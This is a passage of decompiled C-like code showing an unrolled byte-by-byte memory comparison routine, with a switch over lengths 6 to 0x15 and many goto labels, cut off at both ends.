										__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t561 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t561;
										}
										goto L255;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t555 = __edx - 1; // -1
									__esi = __edx + _t555;
									if(__edx + _t555 != 0) {
										goto L98;
									}
									goto L252;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t549 = __edx - 1; // -1
								__esi = __edx + _t549;
								if(__edx + _t549 != 0) {
									goto L98;
								}
								goto L250;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t543 = __edx - 1; // -1
							__esi = __edx + _t543;
							if(__edx + _t543 != 0) {
								goto L98;
							}
							goto L248;
						case 6:
							L324:
							__edx =  *(__eax - 6);
							if( *(__eax - 6) ==  *(__ecx - 6)) {
								__esi = 0;
								L334:
								if(__esi != 0) {
									goto L98;
								}
								goto L335;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 6) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
							if(__esi == 0) {
								L327:
								__esi =  *(__eax - 5) & 0x000000ff;
								__edx =  *(__ecx - 5) & 0x000000ff;
								__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
								if(__esi == 0) {
									L329:
									__esi =  *(__eax - 4) & 0x000000ff;
									__edx =  *(__ecx - 4) & 0x000000ff;
									__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
									if(__esi == 0) {
										L331:
										__esi =  *(__eax - 3) & 0x000000ff;
										__edx =  *(__ecx - 3) & 0x000000ff;
										__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t743 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t743;
										}
										goto L334;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t737 = __edx - 1; // -1
									__esi = __edx + _t737;
									if(__edx + _t737 != 0) {
										goto L98;
									}
									goto L331;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t731 = __edx - 1; // -1
								__esi = __edx + _t731;
								if(__edx + _t731 != 0) {
									goto L98;
								}
								goto L329;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t725 = __edx - 1; // -1
							__esi = __edx + _t725;
							if(__edx + _t725 != 0) {
								goto L98;
							}
							goto L327;
						case 7:
							L405:
							__edx =  *(__eax - 7);
							if( *(__eax - 7) ==  *(__ecx - 7)) {
								__esi = 0;
								L415:
								if(__esi != 0) {
									goto L98;
								}
								goto L416;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 7) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
							if(__esi == 0) {
								L408:
								__esi =  *(__eax - 6) & 0x000000ff;
								__edx =  *(__ecx - 6) & 0x000000ff;
								__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
								if(__esi == 0) {
									L410:
									__esi =  *(__eax - 5) & 0x000000ff;
									__edx =  *(__ecx - 5) & 0x000000ff;
									__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
									if(__esi == 0) {
										L412:
										__esi =  *(__eax - 4) & 0x000000ff;
										__edx =  *(__ecx - 4) & 0x000000ff;
										__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t928 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t928;
										}
										goto L415;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t922 = __edx - 1; // -1
									__esi = __edx + _t922;
									if(__edx + _t922 != 0) {
										goto L98;
									}
									goto L412;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t916 = __edx - 1; // -1
								__esi = __edx + _t916;
								if(__edx + _t916 != 0) {
									goto L98;
								}
								goto L410;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t910 = __edx - 1; // -1
							__esi = __edx + _t910;
							if(__edx + _t910 != 0) {
								goto L98;
							}
							goto L408;
						case 8:
							L154:
							__edx =  *(__eax - 8);
							if( *(__eax - 8) ==  *(__ecx - 8)) {
								__esi = 0;
								L164:
								if(__esi != 0) {
									goto L98;
								}
								goto L165;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 8) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
							if(__esi == 0) {
								L157:
								__esi =  *(__eax - 7) & 0x000000ff;
								__edx =  *(__ecx - 7) & 0x000000ff;
								__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
								if(__esi == 0) {
									L159:
									__esi =  *(__eax - 6) & 0x000000ff;
									__edx =  *(__ecx - 6) & 0x000000ff;
									__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
									if(__esi == 0) {
										L161:
										__esi =  *(__eax - 5) & 0x000000ff;
										__edx =  *(__ecx - 5) & 0x000000ff;
										__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t360 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t360;
										}
										goto L164;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t354 = __edx - 1; // -1
									__esi = __edx + _t354;
									if(__edx + _t354 != 0) {
										goto L98;
									}
									goto L161;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t348 = __edx - 1; // -1
								__esi = __edx + _t348;
								if(__edx + _t348 != 0) {
									goto L98;
								}
								goto L159;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t342 = __edx - 1; // -1
							__esi = __edx + _t342;
							if(__edx + _t342 != 0) {
								goto L98;
							}
							goto L157;
						case 9:
							L234:
							__edx =  *(__eax - 9);
							if( *(__eax - 9) ==  *(__ecx - 9)) {
								__esi = 0;
								L244:
								if(__esi != 0) {
									goto L98;
								}
								goto L245;
							}
							__edx =  *(__ecx - 9) & 0x000000ff;
							__esi =  *(__eax - 9) & 0x000000ff;
							__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
							if(__esi == 0) {
								L237:
								__esi =  *(__eax - 8) & 0x000000ff;
								__edx =  *(__ecx - 8) & 0x000000ff;
								__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
								if(__esi == 0) {
									L239:
									__esi =  *(__eax - 7) & 0x000000ff;
									__edx =  *(__ecx - 7) & 0x000000ff;
									__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
									if(__esi == 0) {
										L241:
										__esi =  *(__eax - 6) & 0x000000ff;
										__edx =  *(__ecx - 6) & 0x000000ff;
										__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t536 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t536;
										}
										goto L244;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t530 = __edx - 1; // -1
									__esi = __edx + _t530;
									if(__edx + _t530 != 0) {
										goto L98;
									}
									goto L241;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t524 = __edx - 1; // -1
								__esi = __edx + _t524;
								if(__edx + _t524 != 0) {
									goto L98;
								}
								goto L239;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t518 = __edx - 1; // -1
							__esi = __edx + _t518;
							if(__edx + _t518 != 0) {
								goto L98;
							}
							goto L237;
						case 0xa:
							L313:
							__edx =  *(__eax - 0xa);
							if( *(__eax - 0xa) ==  *(__ecx - 0xa)) {
								__esi = 0;
								L323:
								if(__esi != 0) {
									goto L98;
								}
								goto L324;
							}
							__edx =  *(__ecx - 0xa) & 0x000000ff;
							__esi =  *(__eax - 0xa) & 0x000000ff;
							__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
							if(__esi == 0) {
								L316:
								__edx =  *(__ecx - 9) & 0x000000ff;
								__esi =  *(__eax - 9) & 0x000000ff;
								__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
								if(__esi == 0) {
									L318:
									__edx =  *(__ecx - 8) & 0x000000ff;
									__esi =  *(__eax - 8) & 0x000000ff;
									__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
									if(__esi == 0) {
										L320:
										__edx =  *(__ecx - 7) & 0x000000ff;
										__esi =  *(__eax - 7) & 0x000000ff;
										__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t718 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t718;
										}
										goto L323;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t712 = __edx - 1; // -1
									__esi = __edx + _t712;
									if(__edx + _t712 != 0) {
										goto L98;
									}
									goto L320;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t706 = __edx - 1; // -1
								__esi = __edx + _t706;
								if(__edx + _t706 != 0) {
									goto L98;
								}
								goto L318;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t700 = __edx - 1; // -1
							__esi = __edx + _t700;
							if(__edx + _t700 != 0) {
								goto L98;
							}
							goto L316;
						case 0xb:
							L394:
							__edx =  *(__eax - 0xb);
							if( *(__eax - 0xb) ==  *(__ecx - 0xb)) {
								__esi = 0;
								L404:
								if(__esi != 0) {
									goto L98;
								}
								goto L405;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xb) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
							if(__esi == 0) {
								L397:
								__esi =  *(__eax - 0xa) & 0x000000ff;
								__edx =  *(__ecx - 0xa) & 0x000000ff;
								__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
								if(__esi == 0) {
									L399:
									__esi =  *(__eax - 9) & 0x000000ff;
									__edx =  *(__ecx - 9) & 0x000000ff;
									__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
									if(__esi == 0) {
										L401:
										__esi =  *(__eax - 8) & 0x000000ff;
										__edx =  *(__ecx - 8) & 0x000000ff;
										__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t903 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t903;
										}
										goto L404;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t897 = __edx - 1; // -1
									__esi = __edx + _t897;
									if(__edx + _t897 != 0) {
										goto L98;
									}
									goto L401;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t891 = __edx - 1; // -1
								__esi = __edx + _t891;
								if(__edx + _t891 != 0) {
									goto L98;
								}
								goto L399;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t885 = __edx - 1; // -1
							__esi = __edx + _t885;
							if(__edx + _t885 != 0) {
								goto L98;
							}
							goto L397;
						case 0xc:
							L143:
							__edx =  *(__eax - 0xc);
							if( *(__eax - 0xc) ==  *(__ecx - 0xc)) {
								__esi = 0;
								L153:
								if(__esi != 0) {
									goto L98;
								}
								goto L154;
							}
							__edx =  *(__ecx - 0xc) & 0x000000ff;
							__esi =  *(__eax - 0xc) & 0x000000ff;
							__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
							if(__esi == 0) {
								L146:
								__esi =  *(__eax - 0xb) & 0x000000ff;
								__edx =  *(__ecx - 0xb) & 0x000000ff;
								__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
								if(__esi == 0) {
									L148:
									__esi =  *(__eax - 0xa) & 0x000000ff;
									__edx =  *(__ecx - 0xa) & 0x000000ff;
									__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
									if(__esi == 0) {
										L150:
										__esi =  *(__eax - 9) & 0x000000ff;
										__edx =  *(__ecx - 9) & 0x000000ff;
										__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t335 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t335;
										}
										goto L153;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t329 = __edx - 1; // -1
									__esi = __edx + _t329;
									if(__edx + _t329 != 0) {
										goto L98;
									}
									goto L150;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t323 = __edx - 1; // -1
								__esi = __edx + _t323;
								if(__edx + _t323 != 0) {
									goto L98;
								}
								goto L148;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t317 = __edx - 1; // -1
							__esi = __edx + _t317;
							if(__edx + _t317 != 0) {
								goto L98;
							}
							goto L146;
						case 0xd:
							L223:
							__edx =  *(__eax - 0xd);
							if( *(__eax - 0xd) ==  *(__ecx - 0xd)) {
								__esi = 0;
								L233:
								if(__esi != 0) {
									goto L98;
								}
								goto L234;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xd) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
							if(__esi == 0) {
								L226:
								__esi =  *(__eax - 0xc) & 0x000000ff;
								__edx =  *(__ecx - 0xc) & 0x000000ff;
								__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
								if(__esi == 0) {
									L228:
									__esi =  *(__eax - 0xb) & 0x000000ff;
									__edx =  *(__ecx - 0xb) & 0x000000ff;
									__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
									if(__esi == 0) {
										L230:
										__esi =  *(__eax - 0xa) & 0x000000ff;
										__edx =  *(__ecx - 0xa) & 0x000000ff;
										__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t510 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t510;
										}
										goto L233;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t504 = __edx - 1; // -1
									__esi = __edx + _t504;
									if(__edx + _t504 != 0) {
										goto L98;
									}
									goto L230;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t498 = __edx - 1; // -1
								__esi = __edx + _t498;
								if(__edx + _t498 != 0) {
									goto L98;
								}
								goto L228;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t492 = __edx - 1; // -1
							__esi = __edx + _t492;
							if(__edx + _t492 != 0) {
								goto L98;
							}
							goto L226;
						case 0xe:
							L302:
							__edx =  *(__eax - 0xe);
							if( *(__eax - 0xe) ==  *(__ecx - 0xe)) {
								__esi = 0;
								L312:
								if(__esi != 0) {
									goto L98;
								}
								goto L313;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xe) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
							if(__esi == 0) {
								L305:
								__esi =  *(__eax - 0xd) & 0x000000ff;
								__edx =  *(__ecx - 0xd) & 0x000000ff;
								__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
								if(__esi == 0) {
									L307:
									__esi =  *(__eax - 0xc) & 0x000000ff;
									__edx =  *(__ecx - 0xc) & 0x000000ff;
									__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
									if(__esi == 0) {
										L309:
										__esi =  *(__eax - 0xb) & 0x000000ff;
										__edx =  *(__ecx - 0xb) & 0x000000ff;
										__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t692 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t692;
										}
										goto L312;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t686 = __edx - 1; // -1
									__esi = __edx + _t686;
									if(__edx + _t686 != 0) {
										goto L98;
									}
									goto L309;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t680 = __edx - 1; // -1
								__esi = __edx + _t680;
								if(__edx + _t680 != 0) {
									goto L98;
								}
								goto L307;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t674 = __edx - 1; // -1
							__esi = __edx + _t674;
							if(__edx + _t674 != 0) {
								goto L98;
							}
							goto L305;
						case 0xf:
							L383:
							__edx =  *(__eax - 0xf);
							if( *(__eax - 0xf) ==  *(__ecx - 0xf)) {
								__esi = 0;
								L393:
								if(__esi != 0) {
									goto L98;
								}
								goto L394;
							}
							__edx =  *(__ecx - 0xf) & 0x000000ff;
							__esi =  *(__eax - 0xf) & 0x000000ff;
							__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
							if(__esi == 0) {
								L386:
								__esi =  *(__eax - 0xe) & 0x000000ff;
								__edx =  *(__ecx - 0xe) & 0x000000ff;
								__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
								if(__esi == 0) {
									L388:
									__esi =  *(__eax - 0xd) & 0x000000ff;
									__edx =  *(__ecx - 0xd) & 0x000000ff;
									__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
									if(__esi == 0) {
										L390:
										__esi =  *(__eax - 0xc) & 0x000000ff;
										__edx =  *(__ecx - 0xc) & 0x000000ff;
										__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t878 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t878;
										}
										goto L393;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t872 = __edx - 1; // -1
									__esi = __edx + _t872;
									if(__edx + _t872 != 0) {
										goto L98;
									}
									goto L390;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t866 = __edx - 1; // -1
								__esi = __edx + _t866;
								if(__edx + _t866 != 0) {
									goto L98;
								}
								goto L388;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t860 = __edx - 1; // -1
							__esi = __edx + _t860;
							if(__edx + _t860 != 0) {
								goto L98;
							}
							goto L386;
						case 0x10:
							L132:
							__edx =  *(__eax - 0x10);
							if( *(__eax - 0x10) ==  *(__ecx - 0x10)) {
								__esi = 0;
								L142:
								if(__esi != 0) {
									goto L98;
								}
								goto L143;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x10) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
							if(__esi == 0) {
								L135:
								__esi =  *(__eax - 0xf) & 0x000000ff;
								__edx =  *(__ecx - 0xf) & 0x000000ff;
								__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
								if(__esi == 0) {
									L137:
									__esi =  *(__eax - 0xe) & 0x000000ff;
									__edx =  *(__ecx - 0xe) & 0x000000ff;
									__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
									if(__esi == 0) {
										L139:
										__esi =  *(__eax - 0xd) & 0x000000ff;
										__edx =  *(__ecx - 0xd) & 0x000000ff;
										__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t309 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t309;
										}
										goto L142;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t303 = __edx - 1; // -1
									__esi = __edx + _t303;
									if(__edx + _t303 != 0) {
										goto L98;
									}
									goto L139;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t297 = __edx - 1; // -1
								__esi = __edx + _t297;
								if(__edx + _t297 != 0) {
									goto L98;
								}
								goto L137;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t291 = __edx - 1; // -1
							__esi = __edx + _t291;
							if(__edx + _t291 != 0) {
								goto L98;
							}
							goto L135;
						case 0x11:
							L212:
							__edx =  *(__eax - 0x11);
							if( *(__eax - 0x11) ==  *(__ecx - 0x11)) {
								__esi = 0;
								L222:
								if(__esi != 0) {
									goto L98;
								}
								goto L223;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x11) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
							if(__esi == 0) {
								L215:
								__esi =  *(__eax - 0x10) & 0x000000ff;
								__edx =  *(__ecx - 0x10) & 0x000000ff;
								__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
								if(__esi == 0) {
									L217:
									__esi =  *(__eax - 0xf) & 0x000000ff;
									__edx =  *(__ecx - 0xf) & 0x000000ff;
									__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
									if(__esi == 0) {
										L219:
										__esi =  *(__eax - 0xe) & 0x000000ff;
										__edx =  *(__ecx - 0xe) & 0x000000ff;
										__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t485 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t485;
										}
										goto L222;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t479 = __edx - 1; // -1
									__esi = __edx + _t479;
									if(__edx + _t479 != 0) {
										goto L98;
									}
									goto L219;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t473 = __edx - 1; // -1
								__esi = __edx + _t473;
								if(__edx + _t473 != 0) {
									goto L98;
								}
								goto L217;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t467 = __edx - 1; // -1
							__esi = __edx + _t467;
							if(__edx + _t467 != 0) {
								goto L98;
							}
							goto L215;
						case 0x12:
							L291:
							__edx =  *(__eax - 0x12);
							if( *(__eax - 0x12) ==  *(__ecx - 0x12)) {
								__esi = 0;
								L301:
								if(__esi != 0) {
									goto L98;
								}
								goto L302;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x12) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
							if(__esi == 0) {
								L294:
								__esi =  *(__eax - 0x11) & 0x000000ff;
								__edx =  *(__ecx - 0x11) & 0x000000ff;
								__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
								if(__esi == 0) {
									L296:
									__esi =  *(__eax - 0x10) & 0x000000ff;
									__edx =  *(__ecx - 0x10) & 0x000000ff;
									__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
									if(__esi == 0) {
										L298:
										__esi =  *(__eax - 0xf) & 0x000000ff;
										__edx =  *(__ecx - 0xf) & 0x000000ff;
										__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t667 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t667;
										}
										goto L301;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t661 = __edx - 1; // -1
									__esi = __edx + _t661;
									if(__edx + _t661 != 0) {
										goto L98;
									}
									goto L298;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t655 = __edx - 1; // -1
								__esi = __edx + _t655;
								if(__edx + _t655 != 0) {
									goto L98;
								}
								goto L296;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t649 = __edx - 1; // -1
							__esi = __edx + _t649;
							if(__edx + _t649 != 0) {
								goto L98;
							}
							goto L294;
						case 0x13:
							L372:
							__edx =  *(__eax - 0x13);
							if( *(__eax - 0x13) ==  *(__ecx - 0x13)) {
								__esi = 0;
								L382:
								if(__esi != 0) {
									goto L98;
								}
								goto L383;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x13) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
							if(__esi == 0) {
								L375:
								__esi =  *(__eax - 0x12) & 0x000000ff;
								__edx =  *(__ecx - 0x12) & 0x000000ff;
								__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
								if(__esi == 0) {
									L377:
									__esi =  *(__eax - 0x11) & 0x000000ff;
									__edx =  *(__ecx - 0x11) & 0x000000ff;
									__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
									if(__esi == 0) {
										L379:
										__esi =  *(__eax - 0x10) & 0x000000ff;
										__edx =  *(__ecx - 0x10) & 0x000000ff;
										__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t852 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t852;
										}
										goto L382;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t846 = __edx - 1; // -1
									__esi = __edx + _t846;
									if(__edx + _t846 != 0) {
										goto L98;
									}
									goto L379;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t840 = __edx - 1; // -1
								__esi = __edx + _t840;
								if(__edx + _t840 != 0) {
									goto L98;
								}
								goto L377;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t834 = __edx - 1; // -1
							__esi = __edx + _t834;
							if(__edx + _t834 != 0) {
								goto L98;
							}
							goto L375;
						case 0x14:
							L121:
							__edx =  *(__eax - 0x14);
							if( *(__eax - 0x14) ==  *(__ecx - 0x14)) {
								__esi = 0;
								L131:
								if(__esi != 0) {
									goto L98;
								}
								goto L132;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x14) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
							if(__esi == 0) {
								L124:
								__esi =  *(__eax - 0x13) & 0x000000ff;
								__edx =  *(__ecx - 0x13) & 0x000000ff;
								__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
								if(__esi == 0) {
									L126:
									__esi =  *(__eax - 0x12) & 0x000000ff;
									__edx =  *(__ecx - 0x12) & 0x000000ff;
									__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
									if(__esi == 0) {
										L128:
										__esi =  *(__eax - 0x11) & 0x000000ff;
										__edx =  *(__ecx - 0x11) & 0x000000ff;
										__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t284 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t284;
										}
										goto L131;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t278 = __edx - 1; // -1
									__esi = __edx + _t278;
									if(__edx + _t278 != 0) {
										goto L98;
									}
									goto L128;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t272 = __edx - 1; // -1
								__esi = __edx + _t272;
								if(__edx + _t272 != 0) {
									goto L98;
								}
								goto L126;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t266 = __edx - 1; // -1
							__esi = __edx + _t266;
							if(__edx + _t266 != 0) {
								goto L98;
							}
							goto L124;
						case 0x15:
							L201:
							__edx =  *(__eax - 0x15);
							if( *(__eax - 0x15) ==  *(__ecx - 0x15)) {
								__esi = 0;
								L211:
								if(__esi != 0) {
									goto L98;
								}
								goto L212;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x15) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
							if(__esi == 0) {
								L204:
								__esi =  *(__eax - 0x14) & 0x000000ff;
								__edx =  *(__ecx - 0x14) & 0x000000ff;
								__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
								if(__esi == 0) {
									L206:
									__esi =  *(__eax - 0x13) & 0x000000ff;
									__edx =  *(__ecx - 0x13) & 0x000000ff;
									__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
									if(__esi == 0) {
										L208:
										__esi =  *(__eax - 0x12) & 0x000000ff;
										__edx =  *(__ecx - 0x12) & 0x000000ff;
